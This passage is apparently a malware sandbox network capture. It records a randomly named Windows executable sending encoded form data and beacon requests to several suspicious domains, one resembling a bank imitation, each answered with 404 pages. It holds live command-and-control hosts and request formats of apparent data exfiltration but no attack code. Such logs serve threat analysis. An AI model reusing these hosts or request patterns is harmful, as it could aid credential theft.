                                                                                                                                                                          Data Ascii: 9X=SRVEG1tKNPw2kVT9pl59ey3LSbrDAC8ZCrZctYL/zXyKOubWGRsE7r9lU+2uZZiH5dSsvVgVKQXZz0UJe1qjS60ibbPnyNKx1WbNmZUg4+lInRw8LmIxTeRWV/PP47PqLUcVxK7rYlFEKyEg8+bK7CW1YExqBWumK2GP9EHqYjRouSffvMtT7H2mhNuh4WvzMHDc5pGNJNCoNpmY1rcUB5/hQV3s3ySNpez5Hn2G2zAPcMzetD4JKJhzylLU4BBie22pctB5hNeAl+ydlx34Ppq2s54wPsLoGPdo/1vOknX6MwGBUSDmXGkJUkny35edEtgrJ+n1bNWcYZ0ROJ52/XI6mOn2V2fl64vQde0qwd/dMOHlKMvSBwNlMeuikReYPZ47iZA659kX7c/RKhD5seZsl4JKOSEPnTOKoD+jETTr4u5PVTxTG3mgbKhY1+nU9KAc0abRGAtBrOA6qi2QuB2Al0+NZKkcNFwwRzvcMKg/S9znFZDE4qi0B95XxgGZwj1QwqJEbA7HGVgywbZYf2NHtW3uJRJbAULFcxVW2DGcfV2b7Di7FlNGCy7xniUXLRFG++eCAasRpWc4dvyiNcSzYN4qQN45VGv/KLBNnY7qolOwaqCZ+1AHeGLKvlkim/KiDeWUux10qUrSC96UjbA12CAKIpHyDyP/KMJ6/Rxo9tkM8/FUqxer5Rmt4MMf5XaoOmOY4fOICELEwgkcWKS5lvcusIyEePa1QbyWXv0Xyo59NhxBHrZI6GkUJPlsrGScfDFioe0cwMTpHvo1kTB1zahHOmf52pgysrsIhkPKLSoz9RcyemFNiC75B1VlZ23AUtIf28Nl0zYVXkc5zL0vjzRCBj180V3cPfRdNlO33DxHrzCxGrsOk/qQrrhVWHlVQMbqxz/nfVbz1qRAOIeg/Ow2iLAfZB6R3QIzxWR+eDphwj5HY/EeUxMOXK1Z1gKBKCm+TM0Drwu/TixVGfHJXccKi5BWaLLKz5wIiUkASazlI [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:14:49.773240089 CEST804INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:49 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCedY0IpNtnD0BCpO%2FBw1%2BOB0LBIzNn7SHy9ylSHOlEQJRKp85UN2Vgr6zKaqdiK%2Flw7%2BPRVjHmUay49V%2FMvxLN8Y18iPJtDyC7eKHCxqVEJUP2UxLroZ8cg5JE%2B81e5WaKNGukWrElBnq2y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8d72add41ae94632-DFW
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1784&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1833&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                          Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                                                                                                          Data Ascii: f
                                                                                                                                                                          Oct 23, 2024 17:14:49.773415089 CEST168INData Raw: 39 64 0d 0a ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a
                                                                                                                                                                          Data Ascii: 9dM0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          32192.168.2.550009104.21.3.193802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:51.822381973 CEST529OUTGET /smpu/?1BSHu=OBVxGh8PUTflSv4p&9X=fT9kFChMB5AarVf4uwJ4SjWrUtnRCy4SEYhs5qbUmyCbD8/bJwwHr5ZsD7KDf/ys2t/zimMcaAHu0zRNXmaWGIA1V7G/4fD2oSnkvqck/+1ElBxjD31eR7F5E9/q372Edw== HTTP/1.1
                                                                                                                                                                          Host: www.7wkto5nk230724z.click
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:14:52.490911961 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:52 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oFMq%2FHP9KxePAcG1KDjiKoYwnK%2BCgX8Y2sSDG7ijqpwvHy8uXnlfRRotC%2Fg7LTmhS1REtAEjUHve2jM9WwSRIPDJTxJ%2B9SvKF3mRUQPGr%2BYU02mCRe9ChTdquNkcHUrVTTGcrFhQW%2FhintIW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                          CF-RAY: 8d72ade4dfac47af-DFW
                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1067&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=529&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                          Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error p
                                                                                                                                                                          Oct 23, 2024 17:14:52.491076946 CEST83INData Raw: 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d
                                                                                                                                                                          Data Ascii: age -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          33192.168.2.550010103.71.154.12802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:14:57.540491104 CEST766OUTPOST /b5ow/ HTTP/1.1
                                                                                                                                                                          Host: www.2925588.com
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.2925588.com
                                                                                                                                                                          Referer: http://www.2925588.com/b5ow/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 78 4a 6b 78 36 55 52 50 4b 57 6a 33 51 34 53 51 73 33 78 66 72 62 58 4a 6f 67 36 54 5a 7a 50 50 55 59 58 79 4f 56 37 32 62 4c 6d 31 5a 73 57 58 53 64 36 6d 71 72 64 63 53 52 59 70 4f 70 61 2f 47 68 38 46 73 34 71 58 53 42 61 45 4f 62 4d 4e 6b 32 63 65 79 5a 36 6e 70 48 49 61 52 61 44 70 51 51 71 6b 4c 66 58 7a 62 76 69 74 68 71 32 64 6d 30 4e 71 41 6e 78 52 33 6c 31 70 76 79 2b 6f 68 4f 58 31 50 47 50 49 43 38 53 31 39 57 4a 42 6a 5a 73 32 36 68 54 73 52 32 6d 54 53 76 51 4b 77 37 77 6a 53 5a 38 33 2b 78 45 47 75 54 67 71 65 62 6f 52 56 6b 4b 6a 2f 50 41 36 47 4f 51 42 44 4c 4a 66 48 70 59 3d
                                                                                                                                                                          Data Ascii: 9X=xJkx6URPKWj3Q4SQs3xfrbXJog6TZzPPUYXyOV72bLm1ZsWXSd6mqrdcSRYpOpa/Gh8Fs4qXSBaEObMNk2ceyZ6npHIaRaDpQQqkLfXzbvithq2dm0NqAnxR3l1pvy+ohOX1PGPIC8S19WJBjZs26hTsR2mTSvQKw7wjSZ83+xEGuTgqeboRVkKj/PA6GOQBDLJfHpY=
                                                                                                                                                                          Oct 23, 2024 17:14:58.479059935 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:14:58 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          34192.168.2.550011103.71.154.12802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:00.095596075 CEST786OUTPOST /b5ow/ HTTP/1.1
                                                                                                                                                                          Host: www.2925588.com
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 223
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.2925588.com
                                                                                                                                                                          Referer: http://www.2925588.com/b5ow/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 78 4a 6b 78 36 55 52 50 4b 57 6a 33 53 59 69 51 75 55 4a 66 36 4c 58 49 78 51 36 54 54 54 50 4c 55 59 62 79 4f 51 66 6d 62 2f 4b 31 5a 4a 36 58 54 5a 4f 6d 70 72 64 63 5a 78 59 73 54 5a 61 43 47 68 34 6a 73 35 57 58 53 42 4f 45 4f 62 63 4e 6a 46 30 66 77 4a 36 35 67 6e 49 59 66 36 44 70 51 51 71 6b 4c 66 43 57 62 76 36 74 68 61 47 64 6e 56 4e 70 66 58 78 53 36 31 31 70 72 79 2f 6a 68 4f 58 74 50 48 54 69 43 2f 36 31 39 55 68 42 69 4e 34 31 77 68 54 32 50 47 6e 53 66 50 5a 2f 78 6f 63 34 65 62 35 51 2b 68 59 79 6d 46 52 41 45 35 67 35 47 45 6d 62 76 63 49 4e 58 2b 78 6f 5a 6f 5a 76 5a 2b 4f 6f 34 43 62 73 53 6b 45 37 6b 77 52 38 67 35 51 41 59 6c 4e 4f
                                                                                                                                                                          Data Ascii: 9X=xJkx6URPKWj3SYiQuUJf6LXIxQ6TTTPLUYbyOQfmb/K1ZJ6XTZOmprdcZxYsTZaCGh4js5WXSBOEObcNjF0fwJ65gnIYf6DpQQqkLfCWbv6thaGdnVNpfXxS611pry/jhOXtPHTiC/619UhBiN41whT2PGnSfPZ/xoc4eb5Q+hYymFRAE5g5GEmbvcINX+xoZoZvZ+Oo4CbsSkE7kwR8g5QAYlNO


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          35192.168.2.550012103.71.154.12802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:02.637480974 CEST1803OUTPOST /b5ow/ HTTP/1.1
                                                                                                                                                                          Host: www.2925588.com
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.2925588.com
                                                                                                                                                                          Referer: http://www.2925588.com/b5ow/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Data Raw: 39 58 3d 78 4a 6b 78 36 55 52 50 4b 57 6a 33 53 59 69 51 75 55 4a 66 36 4c 58 49 78 51 36 54 54 54 50 4c 55 59 62 79 4f 51 66 6d 62 2b 65 31 59 2f 75 58 53 2b 53 6d 6f 72 64 63 51 52 59 58 54 5a 61 54 47 68 41 76 73 35 62 71 53 44 32 45 49 35 6b 4e 6d 77 49 66 36 4a 36 35 74 48 49 46 52 61 44 38 51 51 36 2f 4c 66 53 57 62 76 36 74 68 63 71 64 6b 45 4e 70 45 58 78 52 33 6c 31 31 76 79 2f 4c 68 4f 50 58 50 48 6e 59 43 50 61 31 39 30 78 42 76 65 51 31 38 68 54 77 4f 47 6d 42 66 50 46 57 78 6f 41 38 65 61 4d 31 2b 6a 59 79 33 6a 30 50 44 5a 30 41 55 55 75 6d 69 74 55 50 44 62 39 72 51 59 49 56 5a 5a 6e 4a 6b 79 7a 48 5a 54 39 32 76 79 45 43 2b 75 4a 55 65 31 30 61 57 62 39 53 36 70 36 6f 4e 4a 55 6e 61 49 4f 39 48 6b 79 37 38 37 53 64 50 4c 39 65 66 6c 6c 62 6a 39 6e 34 63 7a 71 49 39 59 7a 6d 61 74 4c 4b 72 43 56 37 65 71 59 46 31 52 51 6a 35 71 72 44 31 39 70 6b 4c 44 61 2b 47 41 6b 2f 4e 78 48 58 72 6b 4d 2b 4c 5a 66 56 46 78 4f 31 4a 50 42 4a 4e 50 51 45 51 45 35 38 47 41 7a 5a 72 76 59 38 75 55 71 [TRUNCATED]
                                                                                                                                                                          Data Ascii: 9X=xJkx6URPKWj3SYiQuUJf6LXIxQ6TTTPLUYbyOQfmb+e1Y/uXS+SmordcQRYXTZaTGhAvs5bqSD2EI5kNmwIf6J65tHIFRaD8QQ6/LfSWbv6thcqdkENpEXxR3l11vy/LhOPXPHnYCPa190xBveQ18hTwOGmBfPFWxoA8eaM1+jYy3j0PDZ0AUUumitUPDb9rQYIVZZnJkyzHZT92vyEC+uJUe10aWb9S6p6oNJUnaIO9Hky787SdPL9efllbj9n4czqI9YzmatLKrCV7eqYF1RQj5qrD19pkLDa+GAk/NxHXrkM+LZfVFxO1JPBJNPQEQE58GAzZrvY8uUqptGrTDvPyNQPkeWVm1oY6cpe7VIujLeTd0LDBnimKoOC9nRyzYSYtYlw6vWSw82bno6V3vjYAkGphg6qIxIyH5qet007gnxFD7K6PKIGXQn4rhfPexzjWNWkthxHrc/VPUzK3uJ8BhARfvjeCu6B2BS11IfvE+TpyYQyv8sWqBok21nTcoTeeDcheqJqyfCYGppOWz7jjK4D7atsJv/YiWRNLfHrK0OF3t5/B+Q28lgJ/2vkqdHQ8UyHSwMNpubEzhe3FOEKLuOIXszRWofG9JbTWr0AWDYqZFviia60ToAIlIgRrgKvIU4G9EmUCBI5liJMeQHhHujF2mU5O5FhF7jeni6gKviQtSG/p7dJtjt7b4VzUsWOU6QRLg8RbA93uOJgnQgaknueBtMgEjxEyMA/csw4BM3uKm6joRyDT+1ItVgSWCIGE2Ycs2AGtJm2jaOQwwZvarn0ulVOzw3te+HStPzulHs/HmUzOE3d5cflIqxNshpzXDiDUl99uOUpZCiA/kGkf1TqKvl6fXBoDOikq384JOOYCeunAMaNnLrylcQc9iFqrmo3I4EX+A1uyjLEVKpkduKERR3VMBYq3AxWkoVXQQLjh1vnbEYEgBP3vye/Jg7z5Q66ed/L5iRaOYQ6VXS/fEfOfCAwDtJ0/cUT5OCrfIQz9g [TRUNCATED]
                                                                                                                                                                          Oct 23, 2024 17:15:03.591182947 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:15:03 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          36192.168.2.550013103.71.154.12802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:05.179832935 CEST519OUTGET /b5ow/?9X=8LMR5gxnI2KgXZumrwdc+cOsoyeKRmv9aI/KcgXQMu2PSseta9mr379bAQAaBpSSNlwauLzgQiXoOYlcs2hn5ZOCoHo9ZIPfMV7mBvL1YvynlbmYgkxyCyhThANftQWn+w==&1BSHu=OBVxGh8PUTflSv4p HTTP/1.1
                                                                                                                                                                          Host: www.2925588.com
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                                                                                                                                          Oct 23, 2024 17:15:06.230345964 CEST691INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Wed, 23 Oct 2024 15:15:05 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          37192.168.2.5500143.33.130.190802076C:\Program Files (x86)\GSCZPHOVjhXukdzCGeSKAQHfgYuIybaQpeSIjLBswhyKXEB\kSsZkfadpV.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          Oct 23, 2024 17:15:11.354896069 CEST772OUTPOST /l11k/ HTTP/1.1
                                                                                                                                                                          Host: www.onlinesbi.xyz
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                          Content-Length: 203
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Origin: http://www.onlinesbi.xyz
                                                                                                                                                                          Referer: http://www.onlinesbi.xyz/l11k/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-N9005 Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
